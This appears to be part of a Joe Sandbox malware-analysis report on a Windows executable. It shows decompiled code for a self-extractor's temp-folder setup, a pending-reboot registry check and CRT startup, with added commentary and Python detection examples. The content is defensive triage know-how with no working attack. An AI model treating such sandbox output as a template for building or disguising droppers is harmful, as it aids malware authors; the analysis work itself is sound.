                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                    • API String ID: 1082909758-3746127100
                                                                                                                                                                                                    • Opcode ID: e1220f8335dd41af6fe35fa063d3d1c80747b448f1d1186debb71bf15ecf2c12
                                                                                                                                                                                                    • Instruction ID: 8cb73efb2789e8bbac52965506306cab54835ad6724761aefbfeb29c3bfde6bf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1220f8335dd41af6fe35fa063d3d1c80747b448f1d1186debb71bf15ecf2c12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A11087170250877D310AB369C49F9F375FEFC6721F040017F546D2390CE788982A666
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00FD5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR* _t48;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                                                    					_t48 = 0xfd91e4;
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00FD1680(0xfd91e4, 0x104);
                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                    					_t13 = E00FD58C8(_t48); // executed
                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							 *0xfd9124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                    							return E00FD6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t16 = E00FD597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t61 =  *0xfd8a20; // 0x0
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *0xfd8a20 = 0;
                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0xfd8a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E00FD53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0xfd91e4;
                                                                                                                                                                                                    				E00FD1781(0xfd91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0xfd9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00FD658A(_t48, 0x104, 0xfd1140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E00FD658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD54C9
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD553D
                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD556F
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD53FB
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5402
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD541F
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD542B
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5434
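The API sequence listed above (a GetTempFileNameA probe with the "IXP" prefix that is deleted again straight away, then CreateDirectoryA on an IXP%03d.TMP folder under %TEMP%, with the i386/mips/alpha/ppc platform names chosen from GetSystemInfo's processor architecture) matches the extraction routine of a Microsoft IExpress / wextract-style self-extracting stub wrapped around the payload. The following Python is an added example, not part of this report or of the sample: it turns that pattern into a detection run over API-call lines written in the report's own "Api.Module(args), ref: Address" form. The sample log lines are constructed for the example and modelled on the list above; the indicator names and the classification rule are the example's own choices, not anything the sandbox emits.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample, modelled on the API list in this report (not a captured
# trace): one call per line, "Api.Module(arg,arg,...), ref: Address". The last
# line is a benign CreateDirectoryA added so the rule has a negative case.
SAMPLE_API_LOG = r"""
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD542B
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001), ref: 00FD553D
GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001), ref: 00FD54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\build\,00000000), ref: 00401000
"""

# "Api.Module(args), ref: Address" as printed in the report's API list.
API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)

# IXP000.TMP .. IXPFFF.TMP directly under a Temp folder, trailing backslash optional.
IXP_DIR = re.compile(r"\\Temp\\IXP[0-9A-Fa-f]{3}\.TMP\\?$", re.IGNORECASE)

Call = Dict[str, object]
Finding = Tuple[str, str, str]  # (indicator, path argument, ref address)


def parse_api_log(text: str) -> List[Call]:
    """Parse report-style API lines; lines that do not fit the shape are skipped."""
    calls: List[Call] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = API_LINE.match(line)
        if m is None:
            continue
        calls.append({
            "api": m["api"],
            "module": m["module"],
            "args": m["args"].split(","),  # the report's arguments carry no commas
            "ref": m["ref"],
        })
    return calls


def find_iexpress_indicators(calls: List[Call]) -> List[Finding]:
    """Flag the two calls that characterise the IXP temp-directory setup."""
    findings: List[Finding] = []
    for c in calls:
        args = c["args"]
        api = c["api"]
        if api == "CreateDirectoryA" and args and IXP_DIR.search(args[0]):
            findings.append(("ixp_temp_dir_created", args[0], c["ref"]))
        elif api == "GetTempFileNameA" and len(args) >= 2 and args[1] == "IXP":
            # Writability probe: a temp file with prefix "IXP" in the target dir.
            findings.append(("ixp_write_probe", args[0], c["ref"]))
    return findings


def classify(findings: List[Finding]) -> str:
    """Both indicators together are the SFX extraction pattern; one alone is weak."""
    kinds = {kind for kind, _, _ in findings}
    if {"ixp_temp_dir_created", "ixp_write_probe"} <= kinds:
        return "iexpress-sfx-extraction"
    if kinds:
        return "weak-ixp-indicator"
    return "none"


if __name__ == "__main__":
    found = find_iexpress_indicators(parse_api_log(SAMPLE_API_LOG))
    for kind, path, ref in found:
        print(f"{kind:22s} {path}  ref={ref}")
    print("verdict:", classify(found))
```

The directory regex deliberately anchors on the "\Temp\IXPnnn.TMP" tail rather than on the full C:\Users\user\... path, so the same rule fires on a different user profile or a relocated %TEMP%; the write probe alone is not treated as a hit because any code may pass a three-letter prefix to GetTempFileNameA.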
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                    • API String ID: 1979080616-4185119251
                                                                                                                                                                                                    • Opcode ID: f96fbfc8c77c3c567ca9e9ca51e84ee49fbc5f72a7b63f6db594dfb8419b57a1
                                                                                                                                                                                                    • Instruction ID: 45810f6e5edc7fc0af89af9f1ae88c52a3740d5f9aeb92ceb1e115e615c1018a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f96fbfc8c77c3c567ca9e9ca51e84ee49fbc5f72a7b63f6db594dfb8419b57a1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4315B71F01A15ABCB119F79BC04B7E779BBB81B54B0C012BA402C2340DF74CE01B696
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (basic blocks of E00FD256D, with the API each block calls and its successor blocks)

• 519 fd256d-fd257d -> 520, 521
• 520 fd2583-fd2589 -> 522, 523
• 521 fd2622-fd2627 (call fd24e0) -> 526
• 522 fd25e8-fd2607 (RegOpenKeyExA) -> 528, 529
• 523 fd258b -> 526, 527
• 526 fd2629-fd262f (no successors)
• 527 fd2591-fd2595 -> 526, 530
• 528 fd2609-fd2620 (RegQueryInfoKeyA) -> 531
• 529 fd25e3-fd25e6 -> 526
• 530 fd259b-fd25ba (RegOpenKeyExA) -> 529, 532
• 531 fd25d1-fd25dd (RegCloseKey) -> 529
• 532 fd25bc-fd25cb (RegQueryValueExA) -> 531
C-Code - Quality: 86%
			// Decompiled by the sandbox. __ecx selects the check to run (0, 1, or 2..3).
			// Modes 1..3 probe the Session Manager registry keys that Windows uses for
			// file renames deferred until reboot, i.e. they test whether a reboot is pending.
			E00FD256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00FD24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						// Mode 1: count the values under ...\Session Manager\FileRenameOperations.
						// 0x80000002 = HKEY_LOCAL_MACHINE, 0x20019 = KEY_READ.
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							// Modes 2..3: query the size of the PendingFileRenameOperations value
							// under ...\Session Manager (non-zero means a rename is queued for reboot).
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								// sbb/not idiom: keep _v8 only when the query returned ERROR_SUCCESS.
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00FD4096,00FD4096,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?), ref: 00FD25B2
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00FD4096,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?,00FD4096), ref: 00FD25CB
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?,00FD4096), ref: 00FD25DD
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00FD4096,00FD4096,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?), ref: 00FD25FF
                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00FD4096,00000000,00000000,00000000,00000000,?,00FD1ED3,00000001,00000000), ref: 00FD261A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 00FD25A8
                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 00FD25C3
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00FD25F5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                    • Opcode ID: 8c8b588f898c4e05446c0e94c89f2cc921d1653973db0828fca9d642a710a763
                                                                                                                                                                                                    • Instruction ID: 956068c985f883e9f2c3d45b8859ffe2d6701496d20f194f545c190bb7b34c00
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c8b588f898c4e05446c0e94c89f2cc921d1653973db0828fca9d642a710a763
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24118235D02228BB9B209BA29C0DDFB7F7EDF117A1F184057B808A2204D7318E45F6E1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

Control-flow graph (legend: Executed / Not Executed): 41 basic blocks in fd6a60-fd6c3e, calling GetStartupInfoW, Sleep, _amsg_exit, _initterm, _ismbblead, exit and _cexit plus the internal routines at fd7155, fd7208, fd6c3f, fd7060, fd2bfb and fd724d (block edges not reproduced).
                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed char _t41;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				E00FD7155();
                                                                                                                                                                                                    				_push(0x58);
                                                                                                                                                                                                    				_push(0xfd72b8);
                                                                                                                                                                                                    				E00FD7208(__ebx, __edi, __esi);
                                                                                                                                                                                                    				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                    				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                    				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                    				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                    				_t53 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                    					if(0 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(0 != _t56) {
                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t58 = 1;
                                                                                                                                                                                                    						_t53 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_t67 =  *0xfd88b0 - _t58; // 0x2
                                                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                                                    						__eflags =  *0xfd88b0; // 0x2
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							 *0xfd81e4 = _t58;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0xfd88b0 = _t58;
                                                                                                                                                                                                    							_t37 = E00FD6C3F(0xfd10b8, 0xfd10c4); // executed
                                                                                                                                                                                                    							__eflags = _t37;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                    						L00FD6FF4();
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t68 =  *0xfd88b0 - _t58; // 0x2
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_push(0xfd10b4);
                                                                                                                                                                                                    							_push(0xfd10ac);
                                                                                                                                                                                                    							L00FD7202();
                                                                                                                                                                                                    							 *0xfd88b0 = 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                    							 *0xfd88ac = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t71 =  *0xfd88b4;
                                                                                                                                                                                                    						if( *0xfd88b4 != 0 && E00FD7060(_t71, 0xfd88b4) != 0) {
                                                                                                                                                                                                    							_t60 =  *0xfd88b4; // 0x0
                                                                                                                                                                                                    							 *0xfda288(0, 2, 0);
                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                    							_t30 = E00FD2BFB(0xfd0000, 0, _t59); // executed
                                                                                                                                                                                                    							 *0xfd81e0 = _t30;
                                                                                                                                                                                                    							__eflags =  *0xfd81f8;
                                                                                                                                                                                                    							if( *0xfd81f8 == 0) {
                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *0xfd81e4;
                                                                                                                                                                                                    							if( *0xfd81e4 == 0) {
                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                    								_t30 =  *0xfd81e0; // 0x0
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					return E00FD724D(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}
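The tail of the decompiled routine above (from the `__imp___acmdln` load to `exit(_t30)`) is the MSVC CRT's WinMain startup path: it reads the raw command line, walks past the program name while toggling an in-quotes flag on `"`, skips the whitespace that follows, derives nShowCmd from `STARTUPINFOW.dwFlags & STARTF_USESHOWWINDOW` (the `[ebp-0x3c]` / `[ebp-0x38]` fields of the structure filled by `GetStartupInfoW`) and then calls `E00FD2BFB(0xfd0000, 0, <cmdline>, nShowCmd)`, which is the WinMain(hInstance, hPrevInstance, lpCmdLine, nShowCmd) convention. The following Python reimplementation is an added example, not code from the report or from the sample, that makes the command-line splitting visible on constructed inputs. It assumes a non-DBCS code page, so the `_ismbblead()` check in the original never fires and every character is a single byte.

```python
"""Added example: reimplementation of the CRT command-line skip and nShowCmd
derivation seen in the decompiled startup routine. Not the sample's own code;
assumes a non-DBCS code page (so _ismbblead() is always 0)."""

STARTF_USESHOWWINDOW = 0x00000001   # STARTUPINFO.dwFlags bit tested at [ebp-0x3c]
SW_SHOWDEFAULT = 0x0A               # nShowCmd used when that bit is clear (the 0xa literal)


def skip_program_name(cmdline: str) -> str:
    """Return the lpCmdLine that WinMain would receive for a raw _acmdln string.

    Mirrors the decompiled loop: walk the string toggling an in-quotes flag on
    '"'. A character <= 0x20 inside quotes is part of the program name; the
    first such character outside quotes ends the name, after which the whole
    run of whitespace is skipped. Reaching the terminating NUL yields an empty
    lpCmdLine, exactly as the NUL-terminated C string would.
    """
    in_quotes = False                  # the [ebp-0x20] flag, initialised to 0
    i = 0
    n = len(cmdline)
    while True:
        ch = cmdline[i] if i < n else "\0"
        if ord(ch) <= 0x20:
            if ch == "\0":
                return ""              # program name only: WinMain gets ""
            if not in_quotes:
                # whitespace outside quotes: name ends here, eat the run
                while i < n and ord(cmdline[i]) <= 0x20:
                    i += 1
                return cmdline[i:]
            # whitespace inside quotes: still part of the quoted program name
        if ch == '"':
            in_quotes = not in_quotes  # the "_t54 = 0 | (_t54 == 0)" toggle
        i += 1                         # single-byte code page: no lead-byte skip


def show_cmd(dw_flags: int, w_show_window: int) -> int:
    """nShowCmd for WinMain from STARTUPINFO.dwFlags and wShowWindow."""
    if dw_flags & STARTF_USESHOWWINDOW:
        return w_show_window & 0xFFFF  # the WORD field, zero-extended
    return SW_SHOWDEFAULT


if __name__ == "__main__":
    # Constructed sample command lines (not taken from the report).
    for raw in ('"C:\\Program Files\\file.exe" --silent  x',
                'file.exe   /a /b',
                '"C:\\path with spaces\\file.exe"',
                'file.exe'):
        print(repr(raw), "->", repr(skip_program_name(raw)))
```

For triage this means the routine above is compiler-generated startup code rather than sample-specific logic; the sample's own entry point, in WinMain terms, is the function called as E00FD2BFB, whose return value is handed straight to exit().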

                                                                                                                                                                                                    0x00fd6a60
                                                                                                                                                                                                    0x00fd6a6a
                                                                                                                                                                                                    0x00fd6a6c
                                                                                                                                                                                                    0x00fd6a71
                                                                                                                                                                                                    0x00fd6a78
                                                                                                                                                                                                    0x00fd6a7f
                                                                                                                                                                                                    0x00fd6a85
                                                                                                                                                                                                    0x00fd6a8e
                                                                                                                                                                                                    0x00fd6a91
                                                                                                                                                                                                    0x00fd6a93
                                                                                                                                                                                                    0x00fd6a9c
                                                                                                                                                                                                    0x00fd6aa2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6aa6
                                                                                                                                                                                                    0x00fd6ab4
